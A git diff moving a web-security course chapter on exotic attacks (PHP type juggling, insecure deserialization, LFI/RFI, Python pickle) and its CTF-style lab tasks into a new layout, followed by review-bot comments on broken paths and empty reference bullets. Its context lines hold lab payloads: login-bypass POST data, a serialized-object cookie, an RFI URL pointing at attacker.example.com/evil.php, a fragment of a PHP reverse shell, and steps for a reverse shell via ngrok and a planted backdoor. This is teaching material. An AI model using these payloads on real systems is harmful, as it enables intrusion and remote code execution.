diff --git a/exotic-attacks/activities/breaking-hashes/README.md b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/README.md similarity index 96% rename from exotic-attacks/activities/breaking-hashes/README.md rename to chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/README.md index fe41ba4a..7cf97de9 100644 --- a/exotic-attacks/activities/breaking-hashes/README.md +++ b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/README.md @@ -28,4 +28,4 @@ A possible payload in POST data is: `username[]="8"&password[]=8&submit=Login` -Exploit in `../sol/solution.sh`. +Exploit in `../solution/solution.sh`. diff --git a/exotic-attacks/activities/breaking-hashes/deploy/.dockerignore b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/deploy/.dockerignore similarity index 100% rename from exotic-attacks/activities/breaking-hashes/deploy/.dockerignore rename to chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/deploy/.dockerignore diff --git a/exotic-attacks/activities/breaking-hashes/deploy/Dockerfile b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/deploy/Dockerfile similarity index 100% rename from exotic-attacks/activities/breaking-hashes/deploy/Dockerfile rename to chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/deploy/Dockerfile diff --git a/exotic-attacks/activities/breaking-hashes/deploy/Makefile b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/deploy/Makefile similarity index 100% rename from exotic-attacks/activities/breaking-hashes/deploy/Makefile rename to chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/deploy/Makefile 
diff --git a/exotic-attacks/activities/breaking-hashes/flag b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/flag similarity index 100% rename from exotic-attacks/activities/breaking-hashes/flag rename to chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/flag diff --git a/exotic-attacks/activities/breaking-hashes/sol/solution.sh b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/solution/solution.sh old mode 100755 new mode 100644 similarity index 100% rename from exotic-attacks/activities/breaking-hashes/sol/solution.sh rename to chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/solution/solution.sh diff --git a/exotic-attacks/activities/breaking-hashes/src/index-template.php b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/src/index-template.php similarity index 100% rename from exotic-attacks/activities/breaking-hashes/src/index-template.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/src/index-template.php diff --git a/exotic-attacks/activities/breaking-hashes/src/source.bak b/chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/src/source.bak similarity index 100% rename from exotic-attacks/activities/breaking-hashes/src/source.bak rename to chapters/web-application-security/exotic-attacks/drills/tasks/breaking-hashes/src/source.bak diff --git a/exotic-attacks/activities/defaced-website/README.md b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/README.md similarity index 95% rename from exotic-attacks/activities/defaced-website/README.md rename to chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/README.md index 43c41c3d..1f413fdc 100644 --- a/exotic-attacks/activities/defaced-website/README.md +++ b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/README.md 
@@ -21,4 +21,4 @@ The final payload in POST data is: `username=QNKCDZO&password=&submit=Login` -Exploit in `../sol/solution.sh`. +Exploit in `../solution/solution.sh`. diff --git a/exotic-attacks/activities/defaced-website/deploy/.dockerignore b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/deploy/.dockerignore similarity index 100% rename from exotic-attacks/activities/defaced-website/deploy/.dockerignore rename to chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/deploy/.dockerignore diff --git a/exotic-attacks/activities/defaced-website/deploy/Dockerfile b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/deploy/Dockerfile similarity index 100% rename from exotic-attacks/activities/defaced-website/deploy/Dockerfile rename to chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/deploy/Dockerfile diff --git a/exotic-attacks/activities/defaced-website/deploy/Makefile b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/deploy/Makefile similarity index 100% rename from exotic-attacks/activities/defaced-website/deploy/Makefile rename to chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/deploy/Makefile diff --git a/exotic-attacks/activities/defaced-website/flag b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/flag similarity index 100% rename from exotic-attacks/activities/defaced-website/flag rename to chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/flag 
diff --git a/exotic-attacks/activities/defaced-website/sol/solution.sh b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/solution/solution.sh old mode 100755 new mode 100644 similarity index 100% rename from exotic-attacks/activities/defaced-website/sol/solution.sh rename to chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/solution/solution.sh diff --git a/exotic-attacks/activities/defaced-website/src/img/defaced.png b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/src/img/defaced.png similarity index 100% rename from exotic-attacks/activities/defaced-website/src/img/defaced.png rename to chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/src/img/defaced.png diff --git a/exotic-attacks/activities/defaced-website/src/index-template.php b/chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/src/index-template.php similarity index 100% rename from exotic-attacks/activities/defaced-website/src/index-template.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/defaced-website/src/index-template.php diff --git a/exotic-attacks/activities/handy-tool/README.md b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/README.md similarity index 95% rename from exotic-attacks/activities/handy-tool/README.md rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/README.md index 6841437a..84273b43 100644 --- a/exotic-attacks/activities/handy-tool/README.md +++ b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/README.md 
@@ -7,6 +7,7 @@ LFI + PHP Object Injection / PHP Insecure Object Deserialization + RCE ## Exploit The exploit involves opening a reverse shell. You'll need to: + 1. Create an account on [ngrok](https://ngrok.com/) (also confirm your email address). 2. Install `ngrok` on you machine. 3. Forward your 1234 port using: `ngrok tcp 1234`. A ngrok host and IP will be forwarded to your local port. @@ -26,8 +27,9 @@ You guessed it, the handy one is **Unserialize**. After inspecting the source code in the archive, you see what the serialized input object should look like. It has to be a PHP class with two attributes: - * `$condition` - boolean with the value `true` - * `$prop` - a string you can use for remote code execution on the server + +* `$condition` - boolean with the value `true` +* `$prop` - a string you can use for remote code execution on the server Since the actual output of the command is not shown, only the unserialized string, you should try to create a reverse shell. @@ -91,4 +93,4 @@ Now access `/backdoor.php` in the browser and you should have a shell in the `nc Find the flag file and perform a `cat` on it; it should be in `home/ctf/`: `cat /home/ctf/flag.txt`. -Exploit in `../sol/solution.sh`. +Exploit in `../solution/solution.sh`. diff --git a/exotic-attacks/activities/handy-tool/deploy/Dockerfile b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/deploy/Dockerfile similarity index 100% rename from exotic-attacks/activities/handy-tool/deploy/Dockerfile rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/deploy/Dockerfile diff --git a/exotic-attacks/activities/handy-tool/deploy/Makefile b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/deploy/Makefile similarity index 100% rename from exotic-attacks/activities/handy-tool/deploy/Makefile rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/deploy/Makefile 
diff --git a/exotic-attacks/activities/handy-tool/flag b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/flag similarity index 100% rename from exotic-attacks/activities/handy-tool/flag rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/flag diff --git a/exotic-attacks/activities/handy-tool/sol/app.py b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/solution/app.py similarity index 100% rename from exotic-attacks/activities/handy-tool/sol/app.py rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/solution/app.py diff --git a/exotic-attacks/activities/handy-tool/sol/backdoor_name.txt b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/solution/backdoor_name.txt similarity index 100% rename from exotic-attacks/activities/handy-tool/sol/backdoor_name.txt rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/solution/backdoor_name.txt diff --git a/exotic-attacks/activities/handy-tool/sol/make_backdoor.php b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/solution/make_backdoor.php similarity index 100% rename from exotic-attacks/activities/handy-tool/sol/make_backdoor.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/solution/make_backdoor.php diff --git a/exotic-attacks/activities/handy-tool/sol/solution.sh b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/solution/solution.sh old mode 100755 new mode 100644 similarity index 100% rename from exotic-attacks/activities/handy-tool/sol/solution.sh rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/solution/solution.sh 
diff --git a/exotic-attacks/activities/handy-tool/src/index.php b/chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/src/index.php similarity index 100% rename from exotic-attacks/activities/handy-tool/src/index.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/handy-tool/src/index.php diff --git a/exotic-attacks/activities/jar-of-pickles/README.md b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/README.md similarity index 97% rename from exotic-attacks/activities/jar-of-pickles/README.md rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/README.md index 5d04c00e..91bf057a 100644 --- a/exotic-attacks/activities/jar-of-pickles/README.md +++ b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/README.md @@ -46,4 +46,4 @@ Make the request again. You should have a shell now in the `nc` terminal. Find the flag file and perform a `cat` on it; it should be in `home/ctf/`: `cat /home/ctf/flag.txt`. -Exploit in `../sol/solution.sh`. +Exploit in `../solution/solution.sh`. diff --git a/exotic-attacks/activities/jar-of-pickles/deploy/Dockerfile b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/deploy/Dockerfile similarity index 100% rename from exotic-attacks/activities/jar-of-pickles/deploy/Dockerfile rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/deploy/Dockerfile diff --git a/exotic-attacks/activities/jar-of-pickles/deploy/Makefile b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/deploy/Makefile similarity index 100% rename from exotic-attacks/activities/jar-of-pickles/deploy/Makefile rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/deploy/Makefile 
diff --git a/exotic-attacks/activities/jar-of-pickles/flag b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/flag similarity index 100% rename from exotic-attacks/activities/jar-of-pickles/flag rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/flag diff --git a/exotic-attacks/activities/jar-of-pickles/sol/payload.py b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/solution/payload.py similarity index 100% rename from exotic-attacks/activities/jar-of-pickles/sol/payload.py rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/solution/payload.py diff --git a/exotic-attacks/activities/jar-of-pickles/sol/solution.sh b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/solution/solution.sh old mode 100755 new mode 100644 similarity index 100% rename from exotic-attacks/activities/jar-of-pickles/sol/solution.sh rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/solution/solution.sh diff --git a/exotic-attacks/activities/jar-of-pickles/src/app.py b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/src/app.py similarity index 100% rename from exotic-attacks/activities/jar-of-pickles/src/app.py rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/src/app.py diff --git a/exotic-attacks/activities/jar-of-pickles/src/static/img/jar-of-pickles.jpg b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/src/static/img/jar-of-pickles.jpg similarity index 100% rename from exotic-attacks/activities/jar-of-pickles/src/static/img/jar-of-pickles.jpg rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/src/static/img/jar-of-pickles.jpg 
diff --git a/exotic-attacks/activities/jar-of-pickles/src/templates/index.html b/chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/src/templates/index.html similarity index 100% rename from exotic-attacks/activities/jar-of-pickles/src/templates/index.html rename to chapters/web-application-security/exotic-attacks/drills/tasks/jar-of-pickles/src/templates/index.html diff --git a/exotic-attacks/activities/meme-uploader/README.md b/chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/README.md similarity index 95% rename from exotic-attacks/activities/meme-uploader/README.md rename to chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/README.md index 2b9b6c96..03e8fd1e 100644 --- a/exotic-attacks/activities/meme-uploader/README.md +++ b/chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/README.md @@ -23,4 +23,4 @@ Now navigate to: `/uploads/5c7dce216dceb5c1a61108e9db9fa835.php`. The flag should be in the page source (inspect it). -Exploit in `../sol/solution.sh`. +Exploit in `../solution/solution.sh`. diff --git a/exotic-attacks/activities/meme-uploader/deploy/Dockerfile b/chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/deploy/Dockerfile similarity index 100% rename from exotic-attacks/activities/meme-uploader/deploy/Dockerfile rename to chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/deploy/Dockerfile diff --git a/exotic-attacks/activities/meme-uploader/deploy/Makefile b/chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/deploy/Makefile similarity index 100% rename from exotic-attacks/activities/meme-uploader/deploy/Makefile rename to chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/deploy/Makefile 
diff --git a/exotic-attacks/activities/meme-uploader/flag b/chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/flag similarity index 100% rename from exotic-attacks/activities/meme-uploader/flag rename to chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/flag diff --git a/exotic-attacks/activities/meme-uploader/sol/solution.sh b/chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/solution/solution.sh old mode 100755 new mode 100644 similarity index 100% rename from exotic-attacks/activities/meme-uploader/sol/solution.sh rename to chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/solution/solution.sh diff --git a/exotic-attacks/activities/meme-uploader/src/index.php b/chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/src/index.php similarity index 100% rename from exotic-attacks/activities/meme-uploader/src/index.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/meme-uploader/src/index.php diff --git a/exotic-attacks/activities/pro-replacer/README.md b/chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/README.md similarity index 94% rename from exotic-attacks/activities/pro-replacer/README.md rename to chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/README.md index 90a644a8..fbb0b5b1 100644 --- a/exotic-attacks/activities/pro-replacer/README.md +++ b/chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/README.md @@ -33,4 +33,4 @@ Haystack: `m` Output: the flag -Exploit in `../sol/solution.sh`. +Exploit in `../solution/solution.sh`. 
diff --git a/exotic-attacks/activities/pro-replacer/deploy/Dockerfile b/chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/deploy/Dockerfile similarity index 100% rename from exotic-attacks/activities/pro-replacer/deploy/Dockerfile rename to chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/deploy/Dockerfile diff --git a/exotic-attacks/activities/pro-replacer/deploy/Makefile b/chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/deploy/Makefile similarity index 100% rename from exotic-attacks/activities/pro-replacer/deploy/Makefile rename to chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/deploy/Makefile diff --git a/exotic-attacks/activities/pro-replacer/flag b/chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/flag similarity index 100% rename from exotic-attacks/activities/pro-replacer/flag rename to chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/flag diff --git a/exotic-attacks/activities/pro-replacer/sol/solution.sh b/chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/solution/solution.sh old mode 100755 new mode 100644 similarity index 100% rename from exotic-attacks/activities/pro-replacer/sol/solution.sh rename to chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/solution/solution.sh diff --git a/exotic-attacks/activities/pro-replacer/src/index.php b/chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/src/index.php similarity index 100% rename from exotic-attacks/activities/pro-replacer/src/index.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/pro-replacer/src/index.php 
diff --git a/exotic-attacks/activities/todo-app/README.md b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/README.md similarity index 97% rename from exotic-attacks/activities/todo-app/README.md rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/README.md index 92a4a9be..adb4c95c 100644 --- a/exotic-attacks/activities/todo-app/README.md +++ b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/README.md @@ -30,4 +30,4 @@ So we have to make a request with the result as cookie: `Cookie: todos=760463360e4919ca238d1566fc26661fa%3A1%3A%7Bi%3A0%3BO%3A16%3A%22GPLSourceBloater%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D` -Exploit in `../sol/solution.sh`. +Exploit in `../solution/solution.sh`. diff --git a/exotic-attacks/activities/todo-app/deploy/.dockerignore b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/deploy/.dockerignore similarity index 100% rename from exotic-attacks/activities/todo-app/deploy/.dockerignore rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/deploy/.dockerignore diff --git a/exotic-attacks/activities/todo-app/deploy/Dockerfile b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/deploy/Dockerfile similarity index 100% rename from exotic-attacks/activities/todo-app/deploy/Dockerfile rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/deploy/Dockerfile diff --git a/exotic-attacks/activities/todo-app/deploy/Makefile b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/deploy/Makefile similarity index 100% rename from exotic-attacks/activities/todo-app/deploy/Makefile rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/deploy/Makefile 
diff --git a/exotic-attacks/activities/todo-app/flag b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/flag similarity index 100% rename from exotic-attacks/activities/todo-app/flag rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/flag diff --git a/exotic-attacks/activities/todo-app/sol/solution.sh b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/solution/solution.sh old mode 100755 new mode 100644 similarity index 100% rename from exotic-attacks/activities/todo-app/sol/solution.sh rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/solution/solution.sh diff --git a/exotic-attacks/activities/todo-app/src/flag-template.php b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/src/flag-template.php similarity index 100% rename from exotic-attacks/activities/todo-app/src/flag-template.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/src/flag-template.php diff --git a/exotic-attacks/activities/todo-app/src/index.php b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/src/index.php similarity index 100% rename from exotic-attacks/activities/todo-app/src/index.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/src/index.php diff --git a/exotic-attacks/activities/todo-app/src/license.txt b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/src/license.txt similarity index 100% rename from exotic-attacks/activities/todo-app/src/license.txt rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/src/license.txt 
diff --git a/exotic-attacks/activities/todo-app/src/payload.php b/chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/src/payload.php similarity index 100% rename from exotic-attacks/activities/todo-app/src/payload.php rename to chapters/web-application-security/exotic-attacks/drills/tasks/todo-app/src/payload.php diff --git a/exotic-attacks/assets/demo-php-serialize.php b/chapters/web-application-security/exotic-attacks/media/demo-php-serialize.php similarity index 100% rename from exotic-attacks/assets/demo-php-serialize.php rename to chapters/web-application-security/exotic-attacks/media/demo-php-serialize.php diff --git a/exotic-attacks/assets/demo-python-pickle.py b/chapters/web-application-security/exotic-attacks/media/demo-python-pickle.py similarity index 100% rename from exotic-attacks/assets/demo-python-pickle.py rename to chapters/web-application-security/exotic-attacks/media/demo-python-pickle.py diff --git a/exotic-attacks/assets/language-stats.png b/chapters/web-application-security/exotic-attacks/media/language-stats.png similarity index 100% rename from exotic-attacks/assets/language-stats.png rename to chapters/web-application-security/exotic-attacks/media/language-stats.png diff --git a/exotic-attacks/assets/loose-comparison.png b/chapters/web-application-security/exotic-attacks/media/loose-comparison.png similarity index 100% rename from exotic-attacks/assets/loose-comparison.png rename to chapters/web-application-security/exotic-attacks/media/loose-comparison.png diff --git a/exotic-attacks/assets/magic-hashes.png b/chapters/web-application-security/exotic-attacks/media/magic-hashes.png similarity index 100% rename from exotic-attacks/assets/magic-hashes.png rename to chapters/web-application-security/exotic-attacks/media/magic-hashes.png 
diff --git a/exotic-attacks/assets/strict-comparison.png b/chapters/web-application-security/exotic-attacks/media/strict-comparison.png similarity index 100% rename from exotic-attacks/assets/strict-comparison.png rename to chapters/web-application-security/exotic-attacks/media/strict-comparison.png diff --git a/exotic-attacks/assets/type-juggling.png b/chapters/web-application-security/exotic-attacks/media/type-juggling.png similarity index 100% rename from exotic-attacks/assets/type-juggling.png rename to chapters/web-application-security/exotic-attacks/media/type-juggling.png diff --git a/exotic-attacks/assets/version-stats.png b/chapters/web-application-security/exotic-attacks/media/version-stats.png similarity index 100% rename from exotic-attacks/assets/version-stats.png rename to chapters/web-application-security/exotic-attacks/media/version-stats.png diff --git a/exotic-attacks/assets/what-is-rfi-attack.png b/chapters/web-application-security/exotic-attacks/media/what-is-rfi-attack.png similarity index 100% rename from exotic-attacks/assets/what-is-rfi-attack.png rename to chapters/web-application-security/exotic-attacks/media/what-is-rfi-attack.png diff --git a/exotic-attacks/index.md b/chapters/web-application-security/exotic-attacks/reading/index.md similarity index 95% rename from exotic-attacks/index.md rename to chapters/web-application-security/exotic-attacks/reading/index.md index de92e901..535f5764 100644 --- a/exotic-attacks/index.md +++ b/chapters/web-application-security/exotic-attacks/reading/index.md 
@@ -13,14 +13,14 @@ The most common server-side language on the web today is still **PHP**. There are lots of legacy websites which used this language to begin with, and a complete refactor is just not worth it. Today, even if there are better options for the server-side choice, PHP is still pretty popular. -![Server Side Languages Popularity](./assets/language-stats.png) +![Server Side Languages Popularity](./media/language-stats.png) Source [here](https://w3techs.com/technologies/overview/programming_language). There are also lots of different PHP versions, each with its own vulnerabilities. A small insight into the distribution of versions across the web is: -![PHP Versions Popularity](./assets/version-stats.png) +![PHP Versions Popularity](./media/version-stats.png) Source [here](https://w3techs.com/technologies/details/pl-php). @@ -39,7 +39,7 @@ But this kind of flexibility sometimes causes unexpected errors in the program f In this section we will discuss **PHP type juggling** and how this can lead to authentication bypass vulnerabilities. -![Type Juggling examples](./assets/type-juggling.png) +![Type Juggling examples](./media/type-juggling.png) ## How PHP compares values @@ -88,7 +88,7 @@ The following tables showcase the difference between the two comparison modes: | Loose comparison | Strict comparison | | ------------------- | ------------------- | -| ![Loose comparison](./assets/loose-comparison.png) | ![Strict comparison](./assets/strict-comparison.png) | +| ![Loose comparison](./media/loose-comparison.png) | ![Strict comparison](./media/strict-comparison.png) | However, loose type comparison behavior like the one presented above is pretty common in PHP and many built-in functions work in the same way. You can probably already see how this can be very problematic, but how exactly can hackers exploit this behavior? 
@@ -393,7 +393,7 @@ Potential web security consequences of a successful **RFI** attack range from ** **Remote file inclusion** attacks usually occur when an application receives a path to a file as input for a web page and does not properly sanitize it. This allows an external URL to be supplied to the include function. -![RFI Attack](./assets/what-is-rfi-attack.png) +![RFI Attack](./media/what-is-rfi-attack.png) The above definitions are very similar, so what is the exact difference between the two of them and how does an exploit affect the web application in each case? @@ -446,7 +446,7 @@ Payload: `http://example.com/?file=http://attacker.example.com/evil.php` This means that getting a reverse shell on a web server will grant you only the rights of the user running the website. In order to get root access on the machine, further **privilege escalation** methods should be employed, which you will learn about in a future session. -### Example of a simple reverse shell in PHP: +### Example of a simple reverse shell in PHP ```php $sock, 1=>$sock, 2=>$sock), $pipes); ?> ``` + # Python Insecure Deserialization / `pickle` module We have looked at so many PHP vulnerabilities in this session, but you shouldn't be left with the impression that PHP is the only vulnerable language. @@ -507,6 +508,7 @@ Reading a bit further down in the docs we can see that implementing `__reduce__` When a tuple is returned, it must be between two and six items long. Optional items can either be omitted, or `None` can be provided as their value. The semantics of each item are in order: +> > * A callable object that will be called to create the initial version of the object. > * A tuple of arguments for the callable object. An empty tuple must be given if the callable does not accept any argument. [...] 
@@ -550,18 +552,18 @@ In conclusion, the code should be properly tested before being put in production # Further Reading -* https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf -* https://www.netsparker.com/blog/web-security/php-type-juggling-vulnerabilities/ -* https://foxglovesecurity.com/2017/02/07/type-juggling-and-php-object-injection-and-sqli-oh-my/ -* https://hydrasky.com/network-security/php-string-comparison-vulnerabilities/ -* https://medium.com/swlh/php-type-juggling-vulnerabilities-3e28c4ed5c09 -* https://nitesculucian.github.io/2018/10/05/php-object-injection-cheat-sheet/ -* https://www.imperva.com/learn/application-security/rfi-remote-file-inclusion/ -* https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/ -* https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/ -* https://bitquark.co.uk/blog/2013/07/23/the_unexpected_dangers_of_preg_replace -* https://www.whitehatsec.com/blog/magic-hashes/ -* https://davidhamann.de/2020/04/05/exploiting-python-pickle/ +* +* +* +* +* +* +* +* +* +* +* +* # Activities diff --git a/exotic-attacks/slides/Makefile b/chapters/web-application-security/exotic-attacks/slides/Makefile similarity index 100% rename from exotic-attacks/slides/Makefile rename to chapters/web-application-security/exotic-attacks/slides/Makefile diff --git a/exotic-attacks/slides/assets/language-stats.png b/chapters/web-application-security/exotic-attacks/slides/assets/language-stats.png similarity index 100% rename from exotic-attacks/slides/assets/language-stats.png rename to chapters/web-application-security/exotic-attacks/slides/assets/language-stats.png diff --git a/exotic-attacks/slides/assets/magic-hashes.png b/chapters/web-application-security/exotic-attacks/slides/assets/magic-hashes.png similarity index 100% rename from exotic-attacks/slides/assets/magic-hashes.png rename to chapters/web-application-security/exotic-attacks/slides/assets/magic-hashes.png 
diff --git a/exotic-attacks/slides/slides.md b/chapters/web-application-security/exotic-attacks/slides/slides.md similarity index 100% rename from exotic-attacks/slides/slides.md rename to chapters/web-application-security/exotic-attacks/slides/slides.md
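Review bot: In the breaking-hashes README hunk (`@@ -28,4 +28,4 @@`), the new link `Exploit in ../solution/solution.sh` does not resolve from the README's own directory: the solution script is renamed to `chapters/.../tasks/breaking-hashes/solution/solution.sh`, a sibling of the README, so `../solution/solution.sh` points one level up into `tasks/solution/`. If the path is meant to be followed from the README, `solution/solution.sh` is the correct form; the old `../sol/solution.sh` had the same problem, so this rename is a good moment to fix it. The same applies to the identical `Exploit in` lines in the defaced-website, handy-tool, jar-of-pickles, meme-uploader, pro-replacer and todo-app README hunks.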
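Review bot: Every `sol/solution.sh` rename in this patch also carries `old mode 100755 new mode 100644`, which drops the executable bit on the solution scripts (breaking-hashes, defaced-website, handy-tool, jar-of-pickles, meme-uploader, pro-replacer, todo-app). A pure move should not change the mode; if the scripts are meant to be run as `./solution.sh`, restore it with `git update-index --chmod=+x` on each file, or say in the commit message that the scripts are now intended to be invoked via `bash solution.sh`.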
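Review bot: In the handy-tool README hunk `@@ -7,6 +7,7 @@`, the context line `2. Install ngrok on you machine.` has a typo ("you" for "your"), and the next line reads `A ngrok host and IP` where "An ngrok host" is expected. Since this list is already being touched to add the blank line markdownlint wants, it would be cheap to fix both while here.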
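Review bot: In the handy-tool README hunk `@@ -91,4 +93,4 @@`, the context line says the flag `should be in home/ctf/` (no leading slash) while the command that follows uses `cat /home/ctf/flag.txt`; the two should agree, and `/home/ctf/` is the one that matches the command. The same inconsistency is in the jar-of-pickles README hunk `@@ -46,4 +46,4 @@`.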
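Review bot: The image path rewrites in `index.md` (hunks `@@ -13,14 +13,14 @@`, `@@ -39,7 +39,7 @@`, `@@ -88,7 +88,7 @@` and `@@ -393,7 +393,7 @@`) look wrong relative to the file's new location. `index.md` moves to `chapters/web-application-security/exotic-attacks/reading/index.md`, while the images move to `chapters/web-application-security/exotic-attacks/media/`, a sibling of `reading/`. From `reading/index.md`, `./media/language-stats.png` resolves to `reading/media/language-stats.png`, which this patch does not create, so all eight images would render broken. Either use `../media/...` in these hunks, or move the images under `reading/media/`; whichever is chosen, check the rendered page rather than only the lint output.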
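Review bot: The Further Reading hunk `@@ -550,18 +552,18 @@` replaces twelve bare-URL bullets with twelve bullets that, as shown in this diff, contain nothing after `* `, which would drop every reference from the rendered list. If the intent was to wrap each URL in `<...>` angle brackets so markdownlint accepts it, please confirm the URLs are actually present in the committed file and that nothing in the tooling stripped them; an empty list is worse than a lint warning.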